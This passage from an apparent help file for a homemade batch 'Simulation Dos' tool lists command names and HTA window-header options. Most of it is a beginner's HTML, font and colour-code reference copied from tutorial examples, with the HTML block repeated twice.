  653. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  654. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  655. [COMMANDS] => [CD]; [CLIP]; [DIR]; [ATTRIB]; [COPY]; [WMIC]; [NET]; [MD]
  656. [COMMANDS] => [FIND]; [VIRUS]; [NIRCMD]; [RAR]; [CSS]; [HTML]; [HTA]
  657. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  658. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  659. [HTA] EXMPLE=1
  660. [HTA] <HTA:APPLICATION
  661. [HTA] ICON="cmd.exe"
  662. [HTA] APPLICATIONNAME = "Microsoft Windows [version 7.1 7631] Copyright Simulation Dos © Najeeb © 2021"
  663. [HTA] BORDER="dialog"
  664. [HTA] BORDERSTYLE="complex"
  665. [HTA] SINGLEINSTANCE="yes"
  666. [HTA] WINDOWSTATE="maximize"
  667. [HTA] >
  668. [HTA] EXMPLE=2
  669. [HTA] <html>
  670. [HTA] <head>
  671. [HTA] <TITLE>MATRIX LOGIN © NAJEEB © 2021</TITLE>
  672. [HTA] <HTA:APPLICATION
  673. [HTA] APPLICATIONNAME="MATRIX LOGIN © NAJEEB © 2021"
  674. [HTA] VERSION="1.0.0.0"
  675. [HTA] BORDER="none" ; "Thin" ; "Dialog"
  676. [HTA] BORDERSTYLE="Complex" ; "Raised" ; "Static" ; "Sunken" ; "Normal"
  677. [HTA] INNERBORDER="no" ; "Yes"
  678. [HTA] CAPTION="no" ; "Yes"
  679. [HTA] SYSMENU="no" ; "Yes"
  680. [HTA] MAXIMIZEBUTTON="no" ; "Yes"
  681. [HTA] MINIMIZEBUTTON="no" ; "Yes"
  682. [HTA] ICON="NO" ; "cmd.exe" ; "C:\Windows\N.ico"
  683. [HTA] SCROLL="no" ; "Yes" ; "Auto"
  684. [HTA] SCROLLFLAT="yes" ; "No"
  685. [HTA] SINGLEINSTANCE="yes" ; "No"
  686. [HTA] WINDOWSTATE="maximize" ; "Normal" ; "Minimize"
  687. [HTA] SHOWINTASKBAR="no" ; "Yes"
  688. [HTA] CONTEXTMENU="no" ; "Yes"
  689. [HTA] SELECTION="no" ; "Yes"
  690. [HTA] NAVIGABLE="no" ; "Yes"
  691. [HTA] ID="oHTA"
  692. [HTA] />
  693. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  694. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  695. [HTML] <DOCTYPE html>
  696. [HTML] <html>
  697. [HTML] <-- Write your comments here -->
  698. [HTML] <head>
  699. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  700. [HTML] </canvas>
  701. [HTML] <title>My Page Title</title>
  702. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  703. [HTML] </head>
  704. [HTML] <body>
  705. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  706. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  707. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  708. [HTML] <script>
  709. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  710. [HTML] </script>
  711. [HTML] <svg width="300" height="200">
  712. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  713. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  714. [HTML] </svg>
  715. [HTML] <svg width="100" height="100">
  716. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  717. [HTML] </svg>
  718. [HTML] <svg width="400" height="180">
  719. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  720. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  721. [HTML] </svg>
  722. [HTML] <svg height="130" width="500">
  723. [HTML] <defs>
  724. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  725. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  726. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  727. [HTML] </linearGradient>
  728. [HTML] </defs>
  729. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  730. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  731. [HTML] Sorry, your browser does not support inline SVG.
  732. [HTML] </svg>
  733. [HTML] <table>
  734. [HTML] <tr>
  735. [HTML] <th>Company</th>
  736. [HTML] <th>Contact</th>
  737. [HTML] <th>Country</th>
  738. [HTML] </tr>
  739. [HTML] <tr>
  740. [HTML] <td>Alfreds Futterkiste</td>
  741. [HTML] <td>Maria Anders</td>
  742. [HTML] <td>Germany</td>
  743. [HTML] </tr>
  744. [HTML] <tr>
  745. [HTML] <td>Centro comercial Moctezuma</td>
  746. [HTML] <td>Francisco Chang</td>
  747. [HTML] <td>Mexico</td>
  748. [HTML] </tr>
  749. [HTML] </table>
  750. [HTML] <ul>
  751. [HTML] <li>Coffee</li>
  752. [HTML] <li>Tea</li>
  753. [HTML] <li>Milk</li>
  754. [HTML] </ul>
  755. [HTML] <pre>TEXT</pre>
  756. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  757. [HTML] <p>This is a paragraph.</p>
  758. [HTML] Line Breaks<br>
  759. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  760. [HTML] <a href="#C4">Jump to Chapter 4</a>
  761. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  762. [HTML] <div style="background-image: url('img_girl.jpg');">
  763. [HTML] </body>
  764. [HTML] </html>
  765. [HTML] ----------------------------------
  766. [HTML] <ul> Defines an unordered list
  767. [HTML] <ul style="list-style-type:disc;">
  768. [HTML] disc Sets the list item marker to a bullet (default)
  769. [HTML] circle Sets the list item marker to a circle
  770. [HTML] square Sets the list item marker to a square
  771. [HTML] none The list items will not be marked
  772. [HTML] <ol> Defines an ordered list
  773. [HTML] <ol type="1">
  774. [HTML] type="1" The list items will be numbered with numbers (default)
  775. [HTML] type="A" The list items will be numbered with uppercase letters
  776. [HTML] type="a" The list items will be numbered with lowercase letters
  777. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  778. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  779. [HTML] <li> Defines a list item
  780. [HTML] <dl> Defines a description list
  781. [HTML] <dt> Defines a term in a description list
  782. [HTML] <dd> Describes the term in a description list
  783. [HTML] HTML Formatting Elements
  784. [HTML] <b> - Bold text</b>
  785. [HTML] <strong> - Important text</strong>
  786. [HTML] <i> - Italic text</i>
  787. [HTML] <em> - Emphasized text</em>
  788. [HTML] <mark> - Marked text</mark>
  789. [HTML] <small> - Smaller text</small>
  790. [HTML] <del> - Deleted text</del>
  791. [HTML] <ins> - Inserted text</ins>
  792. [HTML] <sub> - Subscript text</sub>
  793. [HTML] <sup> - Superscript text/sup>
  794. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  795. [HTML] <address>,<cite>, and <bdo> HTML elements.
  796. [HTML] -----------------------------------------------
  797. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  798. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  799. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  800. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  801. [HTML] ----------------------------------------------------
  802. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  803. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  804. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  805. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  806. [HTML] ----------------------------------------------------------
  807. [HTML] Define the character set used:
  808. [HTML] <meta charset="UTF-8">
  809. [HTML] Define keywords for search engines:
  810. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  811. [HTML] Define a description of your web page:
  812. [HTML] <meta name="description" content="Free Web tutorials">
  813. [HTML] Define the author of a page:
  814. [HTML] <meta name="author" content="John Doe">
  815. [HTML] Refresh document every 30 seconds:
  816. [HTML] <meta http-equiv="refresh" content="30">
  817. [HTML] Setting the viewport to make your website look good on all devices:
  818. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  819. [HTML] -----------------------------------------------------------------
  820. [HTML] <form action="/action_page.php">
  821. [HTML] <label for="fname">First name:</label><br>
  822. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  823. [HTML] <label for="lname">Last name:</label><br>
  824. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  825. [HTML] <input type="submit" value="Submit">
  826. [HTML] </form>
  827. [HTML] ----------------------------------------------
  828. [HTML] <form>
  829. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  830. [HTML] <label for="vehicle1"> I have a bike</label><br>
  831. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  832. [HTML] <label for="vehicle2"> I have a car</label><br>
  833. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  834. [HTML] <label for="vehicle3"> I have a boat</label>
  835. [HTML] </form>
  836. [HTML] -------------------
  837. [HTML] <p>Choose your favorite Web language:</p>
  838. [HTML] <form>
  839. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  840. [HTML] <label for="html">HTML</label><br>
  841. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  842. [HTML] <label for="css">CSS</label><br>
  843. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  844. [HTML] <label for="javascript">JavaScript</label>
  845. [HTML] </form>
  846. [HTML] ---------------------
  847. [HTML] <form action="/action_page.php" novalidate>
  848. [HTML] <label for="email">Enter your email:</label>
  849. [HTML] <input type="email" id="email" name="email"><br><br>
  850. [HTML] <input type="submit" value="Submit">
  851. [HTML] </form>
  852. [HTML] -----------------------------------------------------
  853. [HTML] Here are the different input types you can use in HTML:
  854. [HTML] <input type="button">
  855. [HTML] <input type="checkbox">
  856. [HTML] <input type="color">
  857. [HTML] <input type="date">
  858. [HTML] <input type="datetime-local">
  859. [HTML] <input type="email">
  860. [HTML] <input type="file">
  861. [HTML] <input type="hidden">
  862. [HTML] <input type="image">
  863. [HTML] <input type="month">
  864. [HTML] <input type="number">
  865. [HTML] <input type="password">
  866. [HTML] <input type="radio">
  867. [HTML] <input type="range">
  868. [HTML] <input type="reset">
  869. [HTML] <input type="search">
  870. [HTML] <input type="submit">
  871. [HTML] <input type="tel">
  872. [HTML] <input type="text">
  873. [HTML] <input type="time">
  874. [HTML] <input type="url">
  875. [HTML] <input type="week">
  876. [HTML] --------------------------------------------------------
  877. [HTML] <video width="320" height="240" autoplay muted>
  878. [HTML] <source src="movie.mp4" type="video/mp4">
  879. [HTML] <source src="movie.ogg" type="video/ogg">
  880. [HTML] Your browser does not support the video tag.
  881. [HTML] </video>
  882. [HTML] <video width="320" height="240" autoplay>
  883. [HTML] <source src="movie.mp4" type="video/mp4">
  884. [HTML] <source src="movie.ogg" type="video/ogg">
  885. [HTML] Your browser does not support the video tag.
  886. [HTML] </video>
  887. [HTML] ------------------------------------------------
  888. [HTML] <audio controls autoplay>
  889. [HTML] <source src="horse.ogg" type="audio/ogg">
  890. [HTML] <source src="horse.mp3" type="audio/mpeg">
  891. [HTML] Your browser does not support the audio element.
  892. [HTML] </audio>
  893. [HTML] --------------------------------
  894. [HTML] <audio controls autoplay muted>
  895. [HTML] <source src="horse.ogg" type="audio/ogg">
  896. [HTML] <source src="horse.mp3" type="audio/mpeg">
  897. [HTML] Your browser does not support the audio element.
  898. [HTML] </audio>
  899. [HTML] -------------------------------------
  900. [HTML] <iframe width="420" height="315"
  901. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  902. [HTML] </iframe>
  903. [HTML] -----------------------
  904. [HTML] <iframe width="420" height="315"
  905. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  906. [HTML] </iframe>
  907. [HTML] --------------------------------------------
  908. [HTML] <DOCTYPE HTML>
  909. [HTML] <html>
  910. [HTML] <head>
  911. [HTML] <script>
  912. [HTML] function allowDrop(ev) {
  913. [HTML] ev.preventDefault();
  914. [HTML] }
  915. [HTML] function drag(ev) {
  916. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  917. [HTML] }
  918. [HTML] function drop(ev) {
  919. [HTML] ev.preventDefault();
  920. [HTML] var data = ev.dataTransfer.getData("text");
  921. [HTML] ev.target.appendChild(document.getElementById(data));
  922. [HTML] }
  923. [HTML] </script>
  924. [HTML] </head>
  925. [HTML] <body>
  926. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  927. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  928. [HTML] </body>
  929. [HTML] </html>
  930. [HTML] --------------------------------------------
  931. [HTML] // Store
  932. [HTML] localStorage.setItem("lastname", "Smith");
  933. [HTML] // Retrieve
  934. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  935. [HTML] --------------------------------------------
  936. [HTML] if (localStorage.clickcount) {
  937. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  938. [HTML] } else {
  939. [HTML] localStorage.clickcount = 1;
  940. [HTML] }
  941. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  942. [HTML] localStorage.clickcount + " time(s).";
  943. [HTML] --------------------------------------------
  944. [HTML] if (sessionStorage.clickcount) {
  945. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  946. [HTML] } else {
  947. [HTML] sessionStorage.clickcount = 1;
  948. [HTML] }
  949. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  950. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  951. [HTML] --------------------------------------------
  952. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  953. [HTML] <DOCTYPE html>
  954. [HTML] <html>
  955. [HTML] <-- Write your comments here -->
  956. [HTML] <head>
  957. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  958. [HTML] </canvas>
  959. [HTML] <title>My Page Title</title>
  960. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  961. [HTML] </head>
  962. [HTML] <body>
  963. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  964. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  965. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  966. [HTML] <script>
  967. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  968. [HTML] </script>
  969. [HTML] <svg width="300" height="200">
  970. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  971. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  972. [HTML] </svg>
  973. [HTML] <svg width="100" height="100">
  974. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  975. [HTML] </svg>
  976. [HTML] <svg width="400" height="180">
  977. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  978. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  979. [HTML] </svg>
  980. [HTML] <svg height="130" width="500">
  981. [HTML] <defs>
  982. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  983. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  984. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  985. [HTML] </linearGradient>
  986. [HTML] </defs>
  987. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  988. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  989. [HTML] Sorry, your browser does not support inline SVG.
  990. [HTML] </svg>
  991. [HTML] <table>
  992. [HTML] <tr>
  993. [HTML] <th>Company</th>
  994. [HTML] <th>Contact</th>
  995. [HTML] <th>Country</th>
  996. [HTML] </tr>
  997. [HTML] <tr>
  998. [HTML] <td>Alfreds Futterkiste</td>
  999. [HTML] <td>Maria Anders</td>
  1000. [HTML] <td>Germany</td>
  1001. [HTML] </tr>
  1002. [HTML] <tr>
  1003. [HTML] <td>Centro comercial Moctezuma</td>
  1004. [HTML] <td>Francisco Chang</td>
  1005. [HTML] <td>Mexico</td>
  1006. [HTML] </tr>
  1007. [HTML] </table>
  1008. [HTML] <ul>
  1009. [HTML] <li>Coffee</li>
  1010. [HTML] <li>Tea</li>
  1011. [HTML] <li>Milk</li>
  1012. [HTML] </ul>
  1013. [HTML] <pre>TEXT</pre>
  1014. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  1015. [HTML] <p>This is a paragraph.</p>
  1016. [HTML] Line Breaks<br>
  1017. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  1018. [HTML] <a href="#C4">Jump to Chapter 4</a>
  1019. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  1020. [HTML] <div style="background-image: url('img_girl.jpg');">
  1021. [HTML] </body>
  1022. [HTML] </html>
  1023. [HTML] ----------------------------------
  1024. [HTML] <ul> Defines an unordered list
  1025. [HTML] <ul style="list-style-type:disc;">
  1026. [HTML] disc Sets the list item marker to a bullet (default)
  1027. [HTML] circle Sets the list item marker to a circle
  1028. [HTML] square Sets the list item marker to a square
  1029. [HTML] none The list items will not be marked
  1030. [HTML] <ol> Defines an ordered list
  1031. [HTML] <ol type="1">
  1032. [HTML] type="1" The list items will be numbered with numbers (default)
  1033. [HTML] type="A" The list items will be numbered with uppercase letters
  1034. [HTML] type="a" The list items will be numbered with lowercase letters
  1035. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  1036. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  1037. [HTML] <li> Defines a list item
  1038. [HTML] <dl> Defines a description list
  1039. [HTML] <dt> Defines a term in a description list
  1040. [HTML] <dd> Describes the term in a description list
  1041. [HTML] HTML Formatting Elements
  1042. [HTML] <b> - Bold text</b>
  1043. [HTML] <strong> - Important text</strong>
  1044. [HTML] <i> - Italic text</i>
  1045. [HTML] <em> - Emphasized text</em>
  1046. [HTML] <mark> - Marked text</mark>
  1047. [HTML] <small> - Smaller text</small>
  1048. [HTML] <del> - Deleted text</del>
  1049. [HTML] <ins> - Inserted text</ins>
  1050. [HTML] <sub> - Subscript text</sub>
  1051. [HTML] <sup> - Superscript text/sup>
  1052. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  1053. [HTML] <address>,<cite>, and <bdo> HTML elements.
  1054. [HTML] -----------------------------------------------
  1055. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  1056. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  1057. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  1058. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  1059. [HTML] ----------------------------------------------------
  1060. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  1061. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  1062. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  1063. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  1064. [HTML] ----------------------------------------------------------
  1065. [HTML] Define the character set used:
  1066. [HTML] <meta charset="UTF-8">
  1067. [HTML] Define keywords for search engines:
  1068. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  1069. [HTML] Define a description of your web page:
  1070. [HTML] <meta name="description" content="Free Web tutorials">
  1071. [HTML] Define the author of a page:
  1072. [HTML] <meta name="author" content="John Doe">
  1073. [HTML] Refresh document every 30 seconds:
  1074. [HTML] <meta http-equiv="refresh" content="30">
  1075. [HTML] Setting the viewport to make your website look good on all devices:
  1076. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  1077. [HTML] -----------------------------------------------------------------
  1078. [HTML] <form action="/action_page.php">
  1079. [HTML] <label for="fname">First name:</label><br>
  1080. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  1081. [HTML] <label for="lname">Last name:</label><br>
  1082. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  1083. [HTML] <input type="submit" value="Submit">
  1084. [HTML] </form>
  1085. [HTML] ----------------------------------------------
  1086. [HTML] <form>
  1087. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  1088. [HTML] <label for="vehicle1"> I have a bike</label><br>
  1089. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  1090. [HTML] <label for="vehicle2"> I have a car</label><br>
  1091. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  1092. [HTML] <label for="vehicle3"> I have a boat</label>
  1093. [HTML] </form>
  1094. [HTML] -------------------
  1095. [HTML] <p>Choose your favorite Web language:</p>
  1096. [HTML] <form>
  1097. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  1098. [HTML] <label for="html">HTML</label><br>
  1099. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  1100. [HTML] <label for="css">CSS</label><br>
  1101. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  1102. [HTML] <label for="javascript">JavaScript</label>
  1103. [HTML] </form>
  1104. [HTML] ---------------------
  1105. [HTML] <form action="/action_page.php" novalidate>
  1106. [HTML] <label for="email">Enter your email:</label>
  1107. [HTML] <input type="email" id="email" name="email"><br><br>
  1108. [HTML] <input type="submit" value="Submit">
  1109. [HTML] </form>
  1110. [HTML] -----------------------------------------------------
  1111. [HTML] Here are the different input types you can use in HTML:
  1112. [HTML] <input type="button">
  1113. [HTML] <input type="checkbox">
  1114. [HTML] <input type="color">
  1115. [HTML] <input type="date">
  1116. [HTML] <input type="datetime-local">
  1117. [HTML] <input type="email">
  1118. [HTML] <input type="file">
  1119. [HTML] <input type="hidden">
  1120. [HTML] <input type="image">
  1121. [HTML] <input type="month">
  1122. [HTML] <input type="number">
  1123. [HTML] <input type="password">
  1124. [HTML] <input type="radio">
  1125. [HTML] <input type="range">
  1126. [HTML] <input type="reset">
  1127. [HTML] <input type="search">
  1128. [HTML] <input type="submit">
  1129. [HTML] <input type="tel">
  1130. [HTML] <input type="text">
  1131. [HTML] <input type="time">
  1132. [HTML] <input type="url">
  1133. [HTML] <input type="week">
  1134. [HTML] --------------------------------------------------------
  1135. [HTML] <video width="320" height="240" autoplay muted>
  1136. [HTML] <source src="movie.mp4" type="video/mp4">
  1137. [HTML] <source src="movie.ogg" type="video/ogg">
  1138. [HTML] Your browser does not support the video tag.
  1139. [HTML] </video>
  1140. [HTML] <video width="320" height="240" autoplay>
  1141. [HTML] <source src="movie.mp4" type="video/mp4">
  1142. [HTML] <source src="movie.ogg" type="video/ogg">
  1143. [HTML] Your browser does not support the video tag.
  1144. [HTML] </video>
  1145. [HTML] ------------------------------------------------
  1146. [HTML] <audio controls autoplay>
  1147. [HTML] <source src="horse.ogg" type="audio/ogg">
  1148. [HTML] <source src="horse.mp3" type="audio/mpeg">
  1149. [HTML] Your browser does not support the audio element.
  1150. [HTML] </audio>
  1151. [HTML] --------------------------------
  1152. [HTML] <audio controls autoplay muted>
  1153. [HTML] <source src="horse.ogg" type="audio/ogg">
  1154. [HTML] <source src="horse.mp3" type="audio/mpeg">
  1155. [HTML] Your browser does not support the audio element.
  1156. [HTML] </audio>
  1157. [HTML] -------------------------------------
  1158. [HTML] <iframe width="420" height="315"
  1159. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  1160. [HTML] </iframe>
  1161. [HTML] -----------------------
  1162. [HTML] <iframe width="420" height="315"
  1163. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  1164. [HTML] </iframe>
  1165. [HTML] --------------------------------------------
  1166. [HTML] <DOCTYPE HTML>
  1167. [HTML] <html>
  1168. [HTML] <head>
  1169. [HTML] <script>
  1170. [HTML] function allowDrop(ev) {
  1171. [HTML] ev.preventDefault();
  1172. [HTML] }
  1173. [HTML] function drag(ev) {
  1174. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  1175. [HTML] }
  1176. [HTML] function drop(ev) {
  1177. [HTML] ev.preventDefault();
  1178. [HTML] var data = ev.dataTransfer.getData("text");
  1179. [HTML] ev.target.appendChild(document.getElementById(data));
  1180. [HTML] }
  1181. [HTML] </script>
  1182. [HTML] </head>
  1183. [HTML] <body>
  1184. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  1185. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  1186. [HTML] </body>
  1187. [HTML] </html>
  1188. [HTML] --------------------------------------------
  1189. [HTML] // Store
  1190. [HTML] localStorage.setItem("lastname", "Smith");
  1191. [HTML] // Retrieve
  1192. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  1193. [HTML] --------------------------------------------
  1194. [HTML] if (localStorage.clickcount) {
  1195. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  1196. [HTML] } else {
  1197. [HTML] localStorage.clickcount = 1;
  1198. [HTML] }
  1199. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  1200. [HTML] localStorage.clickcount + " time(s).";
  1201. [HTML] --------------------------------------------
  1202. [HTML] if (sessionStorage.clickcount) {
  1203. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  1204. [HTML] } else {
  1205. [HTML] sessionStorage.clickcount = 1;
  1206. [HTML] }
  1207. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  1208. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  1209. [HTML] --------------------------------------------
  1210. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1211. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1212. [HTML] font-family: "Times New Roman", Times, serif;
  1213. [HTML] font-family: Arial, Helvetica, sans-serif;
  1214. [HTML] font-family: "Lucida Console", "Courier New", monospace;
  1215. [HTML] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  1216. [HTML] Times New Roman;Georgia;Garamond;Arial;Verdana;Helvetica;Courier New
  1217. [HTML] Lucida Console;Monaco;Brush Script MT;Lucida Handwriting;Copperplate
  1218. [HTML] Papyrus
  1219. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1220. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1221. [HTML] AliceBlue(#F0F8FF);AntiqueWhite(#FAEBD7);Aqua(#00FFFF);Aquamarine(#7FFFD4);
  1222. [HTML] Azure(#F0FFFF);Beige(#F5F5DC);Bisque(#FFE4C4);Black(#000000);BlanchedAlmond(#FFEBCD);
  1223. [HTML] Blue(#0000FF);BlueViolet(#8A2BE2);Brown(#A52A2A);Brown(#A52A2A);BurlyWood(#DEB887);
  1224. [HTML] CadetBlue(#5F9EA0);Chartreuse(#7FFF00);Chocolate(#D2691E);Coral(#FF7F50);
  1225. [HTML] CornflowerBlue(#6495ED);Cornsilk(#FFF8DC);Crimson(#DC143C);Cyan(#00FFFF);
  1226. [HTML] DarkBlue(#00008B);DarkCyan(#008B8B);DarkGoldenRod(#B8860B);DarkGray(#A9A9A9);
  1227. [HTML] DarkGreen(#006400);DarkKhaki(#BDB76B);DarkMagenta(#8B008B);DarkOliveGreen(#556B2F);
  1228. [HTML] DarkOrange(#FF8C00);DarkOrchid(#9932CC);DarkRed(#8B0000);DarkSalmon(#E9967A);
  1229. [HTML] DarkSeaGreen(#8FBC8F);DarkSlateBlue(#483D8B);DarkSlateGray(#2F4F4F);DarkSlateGrey(#2F4F4F);
  1230. [HTML] DarkTurquoise(#00CED1);DarkViolet(#9400D3);DeepPink(#FF1493);DeepSkyBlue(#00BFFF);
  1231. [HTML] DimGray(#696969);DodgerBlue(#1E90FF);FireBrick(#B22222);FloralWhite(#FFFAF0);
  1232. [HTML] ForestGreen(#228B22);Fuchsia(#FF00FF);Gainsboro(#DCDCDC);GhostWhite(#F8F8FF);
  1233. [HTML] Gold(#FFD700);GoldenRod(#DAA520);Gray(#808080);Green(#008000);GreenYellow(#ADFF2F);
  1234. [HTML] HoneyDew(#F0FFF0);HotPink(#FF69B4);IndianRed(#CD5C5C);Indigo(#4B0082);Ivory(#FFFFF0);
